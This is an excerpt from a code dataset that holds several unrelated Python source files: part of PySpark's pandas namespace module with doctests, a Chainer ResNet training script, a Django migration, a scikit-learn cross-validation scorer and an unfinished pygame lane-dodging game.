dtype.\n to_datetime : Convert argument to datetime.\n to_timedelta : Convert argument to timedelta.\n numpy.ndarray.astype : Cast a numpy array to a specified type.\n\n Examples\n --------\n\n >>> psser = ps.Series(['1.0', '2', '-3'])\n >>> psser\n 0 1.0\n 1 2\n 2 -3\n dtype: object\n\n >>> ps.to_numeric(psser)\n 0 1.0\n 1 2.0\n 2 -3.0\n dtype: float32\n\n If given Series contains invalid value to cast float, just cast it to `np.nan`\n when `errors` is set to \"coerce\".\n\n >>> psser = ps.Series(['apple', '1.0', '2', '-3'])\n >>> psser\n 0 apple\n 1 1.0\n 2 2\n 3 -3\n dtype: object\n\n >>> ps.to_numeric(psser, errors=\"coerce\")\n 0 NaN\n 1 1.0\n 2 2.0\n 3 -3.0\n dtype: float32\n\n Also support for list, tuple, np.array, or a scalar\n\n >>> ps.to_numeric(['1.0', '2', '-3'])\n array([ 1., 2., -3.])\n\n >>> ps.to_numeric(('1.0', '2', '-3'))\n array([ 1., 2., -3.])\n\n >>> ps.to_numeric(np.array(['1.0', '2', '-3']))\n array([ 1., 2., -3.])\n\n >>> ps.to_numeric('1.0')\n 1.0\n \"\"\"\n if isinstance(arg, Series):\n if errors == \"coerce\":\n return arg._with_new_scol(arg.spark.column.cast(\"float\"))\n elif errors == \"raise\":\n scol = arg.spark.column\n scol_casted = scol.cast(\"float\")\n cond = F.when(\n F.assert_true(scol.isNull() | scol_casted.isNotNull()).isNull(), scol_casted\n )\n return arg._with_new_scol(cond)\n elif errors == \"ignore\":\n raise NotImplementedError(\"'ignore' is not implemented yet, when the `arg` is Series.\")\n else:\n raise ValueError(\"invalid error value specified\")\n else:\n return pd.to_numeric(arg, errors=errors)\n\n\ndef broadcast(obj: DataFrame) -> DataFrame:\n \"\"\"\n Marks a DataFrame as small enough for use in broadcast joins.\n\n .. deprecated:: 3.2.0\n Use :func:`DataFrame.spark.hint` instead.\n\n Parameters\n ----------\n obj : DataFrame\n\n Returns\n -------\n ret : DataFrame with broadcast hint.\n\n See Also\n --------\n DataFrame.merge : Merge DataFrame objects with a database-style join.\n DataFrame.join : Join columns of another DataFrame.\n DataFrame.update : Modify in place using non-NA values from another DataFrame.\n DataFrame.hint : Specifies some hint on the current DataFrame.\n\n Examples\n --------\n >>> df1 = ps.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [1, 2, 3, 5]},\n ... columns=['lkey', 'value']).set_index('lkey')\n >>> df2 = ps.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [5, 6, 7, 8]},\n ... columns=['rkey', 'value']).set_index('rkey')\n >>> merged = df1.merge(ps.broadcast(df2), left_index=True, right_index=True)\n >>> merged.spark.explain() # doctest: +ELLIPSIS\n == Physical Plan ==\n ...\n ...BroadcastHashJoin...\n ...\n \"\"\"\n warnings.warn(\n \"`broadcast` has been deprecated and might be removed in a future version. \"\n \"Use `DataFrame.spark.hint` with 'broadcast' for `name` parameter instead.\",\n FutureWarning,\n )\n if not isinstance(obj, DataFrame):\n raise TypeError(\"Invalid type : expected DataFrame got {}\".format(type(obj).__name__))\n return DataFrame(\n obj._internal.with_new_sdf(F.broadcast(obj._internal.resolved_copy.spark_frame))\n )\n\n\ndef read_orc(\n path: str,\n columns: Optional[List[str]] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> \"DataFrame\":\n \"\"\"\n Load an ORC object from the file path, returning a DataFrame.\n\n Parameters\n ----------\n path : str\n The path string storing the ORC file to be read.\n columns : list, default None\n If not None, only these columns will be read from the file.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options : dict\n All other options passed directly into Spark's data source.\n\n Returns\n -------\n DataFrame\n\n Examples\n --------\n >>> ps.range(1).to_orc('%s/read_spark_io/data.orc' % path)\n >>> ps.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'])\n id\n 0 0\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(1).to_orc('%s/read_spark_io/data.orc' % path, index_col=\"index\")\n >>> ps.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'], index_col=\"index\")\n ... # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 0\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n psdf = read_spark_io(path, format=\"orc\", index_col=index_col, **options)\n\n if columns is not None:\n psdf_columns = psdf.columns\n new_columns = list()\n for column in list(columns):\n if column in psdf_columns:\n new_columns.append(column)\n else:\n raise ValueError(\"Unknown column name '{}'\".format(column))\n psdf = psdf[new_columns]\n\n return psdf\n\n\ndef _get_index_map(\n sdf: PySparkDataFrame, index_col: Optional[Union[str, List[str]]] = None\n) -> Tuple[Optional[List[PySparkColumn]], Optional[List[Label]]]:\n index_spark_columns: Optional[List[PySparkColumn]]\n index_names: Optional[List[Label]]\n if index_col is not None:\n if isinstance(index_col, str):\n index_col = [index_col]\n sdf_columns = set(sdf.columns)\n for col in index_col:\n if col not in sdf_columns:\n raise KeyError(col)\n index_spark_columns = [scol_for(sdf, col) for col in index_col]\n index_names = [(col,) for col in index_col]\n else:\n index_spark_columns = None\n index_names = None\n\n return index_spark_columns, index_names\n\n\n_get_dummies_default_accept_types = (DecimalType, StringType, DateType)\n_get_dummies_acceptable_types = _get_dummies_default_accept_types + (\n ByteType,\n ShortType,\n IntegerType,\n LongType,\n FloatType,\n DoubleType,\n BooleanType,\n TimestampType,\n TimestampNTZType,\n)\n\n\ndef _test() -> None:\n import os\n import doctest\n import shutil\n import sys\n import tempfile\n import uuid\n from pyspark.sql import SparkSession\n import pyspark.pandas.namespace\n\n os.chdir(os.environ[\"SPARK_HOME\"])\n\n globs = pyspark.pandas.namespace.__dict__.copy()\n globs[\"ps\"] = pyspark.pandas\n globs[\"sf\"] = F\n spark = (\n SparkSession.builder.master(\"local[4]\")\n .appName(\"pyspark.pandas.namespace tests\")\n .getOrCreate()\n )\n\n db_name = \"db%s\" % str(uuid.uuid4()).replace(\"-\", \"\")\n spark.sql(\"CREATE DATABASE %s\" % db_name)\n globs[\"db\"] = db_name\n\n path = tempfile.mkdtemp()\n globs[\"path\"] = path\n\n (failure_count, test_count) = doctest.testmod(\n pyspark.pandas.namespace,\n globs=globs,\n optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,\n )\n\n shutil.rmtree(path, ignore_errors=True)\n spark.sql(\"DROP DATABASE IF EXISTS %s CASCADE\" % db_name)\n spark.stop()\n if failure_count:\n sys.exit(-1)\n\n\nif __name__ == \"__main__\":\n _test()\n","sub_path":"python/pyspark/pandas/namespace.py","file_name":"namespace.py","file_ext":"py","file_size_in_byte":133058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"58826137","text":"# coding: utf-8\n#chainer\n\nimport os\nimport sys\nimport chainer\nimport chainer.initializers as I\nimport chainer.functions as F\nimport chainer.links as L\nfrom Core import Trainer\nfrom Chains import classifier as C\nfrom Chains import chain\nfrom Chains import util as U\n\n'''\nSingleReLU dropout 1\nlayer 10\n32-32x2-64x2-128x2-256x2-11\nconv 1 + 2 x 4\nfully 1\nmax pooling\nReLU\n650\n'''\nclass Block(chainer.Chain):\n def __init__(self, initializer, inch, outch, util):\n self.inch = inch\n self.outch = outch\n super(Block, self).__init__()\n with self.init_scope():\n self.conv1 = L.Convolution2D(inch,outch, ksize=3, stride=1, pad=1, initialW=initializer)\n util.add(self.conv1)\n self.conv2 = L.Convolution2D(outch,outch, ksize=3, stride=1, pad=1, initialW=initializer)\n util.add(self.conv2)\n self.bnorm1 = L.BatchNormalization(inch)\n self.bnorm2 = L.BatchNormalization(outch)\n self.bnorm3 = L.BatchNormalization(outch)\n\n def __call__(self, x, test=False):\n h0 = self.bnorm1(x, finetune=test)\n h1 = F.relu(self.bnorm2(self.conv1(h0), finetune=test))\n h1 = F.dropout(h1,0.2)\n h2 = self.bnorm3(self.conv2(h1), finetune=test)\n pad_x = F.concat((x, U.zero_pad(x, self.inch, self.outch)))\n h3 = h2+pad_x\n\n return h3\n\nclass ResidualNN(C.Classifier):\n layer_num = [32,32,64,128,256]\n def __init__(self,initializer, layer_num=layer_num):\n super().__init__(chain.Res4Chain2(initializer,Block, layer_num, initialBN=True))\n\nexport_dir = os.path.join(os.getcwd(),\"save\")\nfilename, ext= os.path.splitext(__file__)\ndataset_dir = os.path.join(os.getcwd(),\"../dataset\")\n\ntrain = Trainer(filename, export_dir, dataset_dir)\ntrain.set_networks(ResidualNN, I.HeNormal)\n\ntrain.model_init()\nlr_update = [[0,200,350,500],[0.3,0.1,0.01,0.001]]\n\ntrain.train_loop(lr_update=lr_update)\n\ntrain.testing()\n\ntrain.export()\n","sub_path":"train/experiment_ResSinDro3.py","file_name":"experiment_ResSinDro3.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116251115","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\nimport django_extensions.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('workflow', '0002_auto_20140717_0224'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserColumnDataMapping',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.CharField(max_length=250)),\n ('data_type', models.CharField(max_length=2, choices=[(b'ca', b'Category'), (b'ft', b'Full Text'), (b'da', b'Date'), (b'fl', b'Decimal Number')])),\n ('created_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': (b'-modified', b'-created'),\n 'abstract': False,\n 'get_latest_by': b'modified',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WorkflowDataMappingRevisionColumnLink',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('user_column_data_mapping', models.ForeignKey(to='workflow.UserColumnDataMapping')),\n ('workflow_data_column_revision', models.ForeignKey(to='workflow.WorkflowDataColumnsRevision')),\n ],\n options={\n 'ordering': (b'-modified', b'-created'),\n 'abstract': False,\n 'get_latest_by': b'modified',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"chembiocrunch/workflow/migrations/0003_usercolumndatamapping_workflowdatamappingrevisioncolumnlink.py","file_name":"0003_usercolumndatamapping_workflowdatamappingrevisioncolumnlink.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632424771","text":"# All scorer.py files must contain the function score(), which takes as input the following items: an instance of one of\n# the models of a modelclass.py file, a feature set, the corresponding correct labels of the feature set, and the set of\n# \"hyperparameters\" of the scoring function. It then returns a dictionary containing the model's scores for various\n# performance metrics e.g. accuracy, precision, recall, etc.\n# It must also include the function scorer_name(), returning the name of the scoring method used.\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn.metrics import accuracy_score, confusion_matrix, f1_score, precision_score, recall_score\nimport numpy as np\n\n\n# NOTES ABOUT THIS PARTICULAR SCORER\n# This scorer uses stratified N-fold cross validation and returns the averaged performance metrics of all N folds\ndef score(model, feature_set, labels, N=3, shuffle=False, calc_acc=True, calc_prc=True, calc_rec=True, calc_f1=True, calc_cm=True):\n assert len(labels) >= N\n skf = StratifiedKFold(labels, n_folds=N, shuffle=shuffle)\n accuracy = []\n precision = []\n recall = []\n f1 = []\n confusion_matrices = []\n for train, test in skf:\n X_train, X_test, y_train, y_test = feature_set[train], feature_set[test], labels[train], labels[test]\n model.fit(X_train, y_train)\n prediction = model.predict(X_test)\n if calc_acc:\n accuracy.append(accuracy_score(y_test, prediction))\n if calc_prc:\n precision.append(precision_score(y_test, prediction, pos_label=None, average='weighted'))\n if calc_rec:\n recall.append(recall_score(y_test, prediction, pos_label=None, average='weighted'))\n if calc_f1:\n f1.append(f1_score(y_test, prediction, pos_label=None, average='weighted'))\n if calc_cm:\n confusion_matrices.append(confusion_matrix(y_test, prediction))\n metrics = {}\n if calc_acc:\n metrics[\"accuracy\"] = np.mean(accuracy)\n if calc_prc:\n metrics[\"precision\"] = np.mean(precision)\n if calc_rec:\n metrics[\"recall\"] = np.mean(recall)\n if calc_f1:\n metrics[\"f1\"] = np.mean(f1)\n if calc_cm:\n metrics[\"confusion_matrix\"] = confusion_matrices[0]\n for matrix in confusion_matrices[1:]:\n metrics[\"confusion_matrix\"] += matrix\n return metrics\n\n\ndef scorer_name():\n return \"Stratified N-fold Cross Validation\"\n","sub_path":"src/enScorers/StratifiedNFoldCV/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621936540","text":"import math\nimport random\nimport time\nimport pygame\nimport sys\nfrom pygame.locals import *\n\nSCREENWIDTH = 720\nSCREENHEIGHT = int(0.75*(SCREENWIDTH))\n\nTVSCREENWIDTH = SCREENWIDTH + 100\nTVSCREENHEIGHT = SCREENHEIGHT + 100\n\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nGREY = (180,180,180)\nDARKGREY =(100,100,100)\nDARKERGREY = (50,50,50)\nRED = (255,0,0)\nGREEN = (0,255,0)\nBLUE = (0,0,255)\n\nPLAYERWIDTH = 80\nPLAYERHEIGHT = 90\nHITBOXWIDTH = 70\nHITBOXHEIGHT = PLAYERHEIGHT\n\nGLITCHWIDTH = PLAYERWIDTH\nGLITCHHEIGHT = PLAYERHEIGHT/2\nGLITCHTIME = 1 #seconds\n\nENEMYWIDTH = 60\nENEMYHEIGHT = 50\nENEMYSPEED = 5\n\nLANE = 6 #1st lane is for display reason\n\nFPS = 30\n\n#pygame.display.set_icon(pygame.image.load(\"\"))\npygame.init()\n\nDisplay = pygame.display.set_mode((TVSCREENWIDTH, TVSCREENHEIGHT))\npygame.display.set_caption(\"Glitchman TV\")\n\n#pygame.mouse.set_cursor(*pygame.cursors.tri_left)\n\nTheFont = pygame.font.Font(\"./font/ZCOOL_QingKe_HuangYou/ZCOOLQingKeHuangYou-Regular.ttf\",30)\n\nENEMYGLITCH = pygame.transform.scale(pygame.image.load(\"./sprite/enemy_glitch.png\"),(ENEMYWIDTH,ENEMYHEIGHT))\nPLAYERGLITCH = pygame.transform.scale(pygame.image.load(\"./sprite/player_glitch.png\"),(int(GLITCHWIDTH),int(GLITCHHEIGHT)))\n\nWALK1 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk1new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK2 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk2new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK3 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk3new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK4 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk4new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK5 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk5new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK6 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk6new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK7 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk7new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\n\nWALK1BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk1new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK2BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk2new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK3BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk3new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK4BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk4new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK5BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk5new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK6BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk6new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK7BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk7new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\n\nPLAYERGLITCHBW = pygame.transform.scale(pygame.image.load(\"./sprite/player_glitch_bw.png\"),(int(GLITCHWIDTH),int(GLITCHHEIGHT)))\n\nRADIUS = 20\n \nclass Player:\n def __init__(self,x,y,width,height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.playerrect = Rect(0,0,self.width,self.height)\n self.playerrect.center = (self.x,self.y)\n\nclass Enemy:\n def __init__(self,width,height):\n self.width = width\n self.height = height\n self.enemyrect = Rect(0,0,width,height)\n self.enemylist = []\n\ndef startscreen():\n run = True\n while run:\n Display.fill(DARKERGREY)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_s:\n run = False\n pygame.draw.rect(Display, GREY, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT))\n pygame.draw.rect(Display, WHITE, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT),3)\n \n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n pygame.display.update()\n pygame.time.Clock().tick(FPS)\n \n pass\n\ndef endscreen():\n pass\n\ndef main():\n run = True\n \n TheTime = 0\n Start = time.time()#start time\n\n #use to check the FPS\n frame = 0;\n realtimeFPS = 0\n previousFrame = 0\n\n #accurate timing\n frametiming = 0\n\n distance = 2*SCREENHEIGHT/LANE - 1*SCREENHEIGHT/LANE\n\n player = Player(PLAYERWIDTH/2 + (TVSCREENWIDTH - SCREENWIDTH)/2,(SCREENHEIGHT/LANE*3/2) + (TVSCREENHEIGHT - SCREENHEIGHT)/2,HITBOXWIDTH,HITBOXHEIGHT)\n enemy = Enemy(ENEMYWIDTH,ENEMYHEIGHT)\n\n glitch = False\n GlitchStart = 0\n glitchcount = 0\n\n spawnBoss = 0 #condition\n\n chance = 2\n collided = False\n\n playercount = 0\n \n while run:\n #for FPS\n End = time.time()#end time\n frame += 1\n frametiming += 1\n if (int(End) - int(Start) == 1):\n TheTime += 1\n Start = time.time()\n #print(TheTime)\n realtimeFPS = (frame - previousFrame)\n #print(\"RealTimeFPS:\", realtimeFPS,\"\\n\")\n previousFrame = frame \n\n \n\n #enemy spawn\n spawnBoss = random.randrange(0,5,1)\n if (frametiming % (FPS*2) == 0):\n if (spawnBoss == 1):\n enemyrect = Rect(0,0,ENEMYWIDTH,SCREENHEIGHT - SCREENHEIGHT/LANE)\n enemyrect.centerx = SCREENWIDTH - ENEMYWIDTH\n enemyrect.centery = SCREENHEIGHT/LANE * LANE/2 + SCREENHEIGHT/LANE/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2\n enemy.enemylist.append(enemyrect)\n else:\n randomlane = random.randrange((SCREENHEIGHT/LANE)*3/2, SCREENHEIGHT, distance)#the lane pixel\n enemyrect = Rect(0,0,ENEMYWIDTH,ENEMYHEIGHT)\n enemyrect.centerx = SCREENWIDTH - ENEMYWIDTH\n enemyrect.centery = randomlane + (TVSCREENHEIGHT - SCREENHEIGHT)/2\n enemy.enemylist.append(enemyrect)\n \n \n Display.fill(DARKERGREY)\n\n #animation count for player\n playercount += 1\n\n if playercount == 7*(FPS/14):\n playercount = 0\n \n #Inputs\n key = pygame.key.get_pressed()\n\n if (key[K_k]):\n print(\"glitching\")\n \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_w:\n #print(\"up\")\n if (player.y != (SCREENHEIGHT/LANE)*3/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2):#2nd lane\n player.y -= distance\n player.playerrect.centery = player.y\n if event.key == K_s:\n #print(\"down\")\n if (player.y != (SCREENHEIGHT) - (SCREENHEIGHT/LANE)/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2):#last lane\n player.y += distance\n player.playerrect.centery = player.y\n if event.key == K_j:\n #print(\"glitch\")\n if glitch == False:\n glitch = True\n\n\n #glitch logic\n if glitch == True:\n glitchcount += 1\n player.playerrect.height = GLITCHHEIGHT\n player.playerrect.width = GLITCHWIDTH\n player.playerrect.centery = player.y\n if glitchcount == int(0.75*FPS): #30 = 1 seconds\n glitchcount = 0\n glitch = False\n \n elif glitch == False:\n player.playerrect.height = HITBOXHEIGHT\n player.playerrect.width = HITBOXWIDTH\n player.playerrect.centery = player.y\n\n #enemy moving logic\n for i in range(len(enemy.enemylist)):\n enemy.enemylist[i].centerx -= ENEMYSPEED\n\n\n #collide logic\n for i in range(len(enemy.enemylist)):\n if (player.playerrect.colliderect(enemy.enemylist[i])) and player.playerrect.height == PLAYERHEIGHT and collided == False:\n chance -= 1\n collided = True\n\n if collided == True:\n if enemy.enemylist[0].right <= (TVSCREENWIDTH - SCREENWIDTH):\n collided = False\n\n \n #destroy enemy item\n for i in range(len(enemy.enemylist)):\n if enemy.enemylist[i].right <= (TVSCREENWIDTH - SCREENWIDTH):\n enemy.enemylist.remove(enemy.enemylist[i])\n break\n\n #game over logic\n if chance == 0:\n run = False\n \n\n #draw\n pygame.draw.rect(Display, GREY, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT))\n for i in range(LANE):\n pygame.draw.line(Display,WHITE,((TVSCREENWIDTH - SCREENWIDTH)/2, ((i+1)*(SCREENHEIGHT)/LANE) + (TVSCREENHEIGHT - SCREENHEIGHT)/2),(SCREENWIDTH + (TVSCREENWIDTH - SCREENWIDTH)/2, ((i+1)*(SCREENHEIGHT)/LANE) + (TVSCREENHEIGHT - SCREENHEIGHT)/2),3)\n pygame.draw.rect(Display, WHITE, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT),3)\n \n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n #pygame.draw.rect(Display,BLUE,player.playerrect,1)\n if chance == 2:\n if player.playerrect.height == PLAYERHEIGHT:\n if (playercount <= 1*(FPS/14)):\n Display.blit(WALK1,player.playerrect)\n\n elif(playercount <= 2*(FPS/14)):\n Display.blit(WALK2,player.playerrect)\n\n elif(playercount <= 3*(FPS/14)):\n Display.blit(WALK3,player.playerrect)\n\n elif(playercount <= 4*(FPS/14)):\n Display.blit(WALK4,player.playerrect)\n\n elif(playercount <= 5*(FPS/14)):\n Display.blit(WALK5,player.playerrect)\n\n elif(playercount <= 6*(FPS/14)):\n Display.blit(WALK6,player.playerrect)\n\n else:\n Display.blit(WALK7,player.playerrect)\n else:\n Display.blit(PLAYERGLITCH, player.playerrect)\n\n elif chance == 1:\n if player.playerrect.height == PLAYERHEIGHT:\n if (playercount <= 1*(FPS/14)):\n Display.blit(WALK1BW,player.playerrect)\n\n elif(playercount <= 2*(FPS/14)):\n Display.blit(WALK2BW,player.playerrect)\n\n elif(playercount <= 3*(FPS/14)):\n Display.blit(WALK3BW,player.playerrect)\n\n elif(playercount <= 4*(FPS/14)):\n Display.blit(WALK4BW,player.playerrect)\n\n elif(playercount <= 5*(FPS/14)):\n Display.blit(WALK5BW,player.playerrect)\n\n elif(playercount <= 6*(FPS/14)):\n Display.blit(WALK6BW,player.playerrect)\n\n else:\n Display.blit(WALK7BW,player.playerrect)\n else:\n Display.blit(PLAYERGLITCHBW, player.playerrect)\n\n \n\n for i in range(len(enemy.enemylist)):\n pygame.draw.rect(Display,RED,enemy.enemylist[i])\n if (enemy.enemylist[i].height == ENEMYHEIGHT):\n Display.blit(ENEMYGLITCH, enemy.enemylist[i])\n elif (enemy.enemylist[i].height != ENEMYHEIGHT):\n amount = int(math.ceil(enemy.enemylist[i].height / ENEMYHEIGHT))\n for j in range(amount):\n Display.blit(ENEMYGLITCH, Rect(enemy.enemylist[i].left, enemy.enemylist[i].top + (j*ENEMYHEIGHT), enemy.enemylist[i].width, enemy.enemylist[i].height + (j*ENEMYHEIGHT)))\n\n Time = TheFont.render(\"Time: \" + str(TheTime) + \"s\", True, BLACK)\n TimeRect = Time.get_rect()\n TimeRect.center = (TimeRect.width/2 + (TVSCREENWIDTH - SCREENWIDTH)/2 + 10, TimeRect.height/2 + (TVSCREENHEIGHT - 